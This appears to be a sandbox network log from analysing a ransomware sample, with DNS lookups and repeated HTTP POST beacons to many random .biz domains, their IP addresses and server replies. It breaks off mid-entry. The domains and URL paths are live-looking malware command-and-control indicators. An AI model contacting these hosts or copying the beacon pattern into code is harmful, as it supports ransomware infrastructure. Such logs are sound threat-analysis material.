HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:35 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
DNS

160.200.246.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.200.246.34.in-addr.arpa

IN PTR

Response

160.200.246.34.in-addr.arpa

IN PTR

ec2-34-246-200-160 eu-west-1compute amazonawscom
DNS

23.154.80.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.154.80.54.in-addr.arpa

IN PTR

Response

23.154.80.54.in-addr.arpa

IN PTR

ec2-54-80-154-23 compute-1 amazonawscom
DNS

qaynky.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
DNS

qaynky.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qaynky.biz

IN A

Response

qaynky.biz

IN A

13.251.16.150
POST

http://qaynky.biz/qhofdfxipetonn

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /qhofdfxipetonn HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=53601caa8d92c5e5576d809078e844db|191.101.209.39|1717923852|1717923852|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

245.26.100.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.26.100.208.in-addr.arpa

IN PTR

Response

245.26.100.208.in-addr.arpa

IN PTR

ip245 208-100-26staticsteadfastdnsnet
DNS

bumxkqgxu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

bumxkqgxu.biz

IN A

Response

bumxkqgxu.biz

IN A

44.221.84.105
POST

http://bumxkqgxu.biz/lph

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /lph HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: bumxkqgxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b92db2c63e057db08841830230ce7b70|191.101.209.39|1717923853|1717923853|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

dwrqljrr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

dwrqljrr.biz

IN A

Response

dwrqljrr.biz

IN A

54.244.188.177
POST

http://dwrqljrr.biz/gldvgpktuk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /gldvgpktuk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: dwrqljrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=465d0285b705615e2fdf84e8761962a3|191.101.209.39|1717923853|1717923853|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nqwjmb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
DNS

nqwjmb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

nqwjmb.biz

IN A

Response

nqwjmb.biz

IN A

35.164.78.200
POST

http://nqwjmb.biz/qshoan

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

35.164.78.200:80

Request

POST /qshoan HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nqwjmb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=32dac8a210a445ebd9a690af8d86475e|191.101.209.39|1717923853|1717923853|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ytctnunms.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
DNS

ytctnunms.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ytctnunms.biz

IN A

Response

ytctnunms.biz

IN A

3.94.10.34
POST

http://ytctnunms.biz/rpibkyg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.94.10.34:80

Request

POST /rpibkyg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1765b5e083cfc23ef26a9d031d1b5912|191.101.209.39|1717923854|1717923854|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

myups.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

myups.biz

IN A

Response

myups.biz

IN A

165.160.13.20

myups.biz

IN A

165.160.15.20
POST

http://myups.biz/ntehlksmceccpt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

165.160.13.20:80

Request

POST /ntehlksmceccpt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Date: Sun, 09 Jun 2024 09:04:14 GMT
Content-Length: 94
POST

http://myups.biz/f

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

165.160.13.20:80

Request

POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Date: Sun, 09 Jun 2024 09:04:14 GMT
Content-Length: 94
DNS

oshhkdluh.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

oshhkdluh.biz

IN A

Response

oshhkdluh.biz

IN A

54.244.188.177
POST

http://oshhkdluh.biz/jrdw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /jrdw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d32ef50ae5d6d70f50baeacd6ab32181|191.101.209.39|1717923855|1717923855|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yunalwv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yunalwv.biz

IN A

Response

yunalwv.biz

IN A

208.100.26.245
DNS

jpskm.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jpskm.biz

IN A

Response

jpskm.biz

IN A

34.211.97.45
POST

http://jpskm.biz/qawiqhpkxlamotxu

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /qawiqhpkxlamotxu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jpskm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7196dfd9374054857286fdf653dd542a|191.101.209.39|1717923855|1717923855|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

34.10.94.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.10.94.3.in-addr.arpa

IN PTR

Response

34.10.94.3.in-addr.arpa

IN PTR

ec2-3-94-10-34 compute-1 amazonawscom
DNS

34.10.94.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

34.10.94.3.in-addr.arpa

IN PTR

Response

34.10.94.3.in-addr.arpa

IN PTR

ec2-3-94-10-34 compute-1 amazonawscom
DNS

200.78.164.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.78.164.35.in-addr.arpa

IN PTR

Response

200.78.164.35.in-addr.arpa

IN PTR

ec2-35-164-78-200 us-west-2compute amazonawscom
DNS

20.13.160.165.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.13.160.165.in-addr.arpa

IN PTR

Response
DNS

lrxdmhrr.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lrxdmhrr.biz

IN A

Response

lrxdmhrr.biz

IN A

54.244.188.177
POST

http://lrxdmhrr.biz/vogxbeexnwh

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /vogxbeexnwh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lrxdmhrr.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8472772b3490009a1ddeac02d0b695d6|191.101.209.39|1717923856|1717923856|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wllvnzb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
DNS

wllvnzb.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

wllvnzb.biz

IN A

Response

wllvnzb.biz

IN A

18.141.10.107
POST

http://wllvnzb.biz/ouwdsfb

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /ouwdsfb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wllvnzb.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=225cb3f6b79b3a1e9322d0b4898c3202|191.101.209.39|1717923857|1717923857|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

45.97.211.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.97.211.34.in-addr.arpa

IN PTR

Response

45.97.211.34.in-addr.arpa

IN PTR

ec2-34-211-97-45 us-west-2compute amazonawscom
DNS

gnqgo.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

54.80.154.23
DNS

gnqgo.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gnqgo.biz

IN A

Response

gnqgo.biz

IN A

54.80.154.23
POST

http://gnqgo.biz/arakrmgfxmkujx

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /arakrmgfxmkujx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gnqgo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=73fd5b8f2b52551072698607fdbbcafe|191.101.209.39|1717923857|1717923857|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

jhvzpcfg.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

jhvzpcfg.biz

IN A

Response

jhvzpcfg.biz

IN A

3.237.86.197
POST

http://jhvzpcfg.biz/fdskdesnk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /fdskdesnk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jhvzpcfg.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bf7c13b49769adee385d382a5a210c00|191.101.209.39|1717923858|1717923858|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

acwjcqqv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
DNS

acwjcqqv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

acwjcqqv.biz

IN A

Response

acwjcqqv.biz

IN A

18.141.10.107
POST

http://acwjcqqv.biz/f

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: acwjcqqv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=cab5013fd3caf45afcb87adbf1191cb8|191.101.209.39|1717923859|1717923859|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

xlfhhhm.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

44.200.43.61
POST

http://xlfhhhm.biz/fvm

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.200.43.61:80

Request

POST /fvm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=bd19607aede02b660ba8b24c022662cf|191.101.209.39|1717923858|1717923858|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/fqd

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

13.251.16.150:80

Request

POST /fqd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=239d273e9151c9d79481768700049881|191.101.209.39|1717923859|1717923859|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
DNS

vyome.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/ujatdwxsqca

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /ujatdwxsqca HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a949fbceba349e87adec2ce5f904e455|191.101.209.39|1717923859|1717923859|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

54.80.154.23
POST

http://yauexmxk.biz/ojqpg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /ojqpg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yauexmxk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=330af310326321ecd42f7d895fead84d|191.101.209.39|1717923859|1717923859|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

iuzpxe.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

iuzpxe.biz

IN A

Response

iuzpxe.biz

IN A

13.251.16.150
DNS

saytjshyf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

3.237.86.197
POST

http://iuzpxe.biz/kgmwamuuuwcb

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /kgmwamuuuwcb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: iuzpxe.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6565b78695db8dab1d4ebf0815350749|191.101.209.39|1717923860|1717923860|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://saytjshyf.biz/f

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.237.86.197:80

Request

POST /f HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=85c1ad001b01194691efaa9e523c7864|191.101.209.39|1717923859|1717923859|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/bsgabfqi

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /bsgabfqi HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fa39e437437d38820f1031147dbc213d|191.101.209.39|1717923860|1717923860|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

86.104.213.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.104.213.44.in-addr.arpa

IN PTR

Response

86.104.213.44.in-addr.arpa

IN PTR

ec2-44-213-104-86 compute-1 amazonawscom
DNS

86.104.213.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.104.213.44.in-addr.arpa

IN PTR

Response

86.104.213.44.in-addr.arpa

IN PTR

ec2-44-213-104-86 compute-1 amazonawscom
DNS

sxmiywsfv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

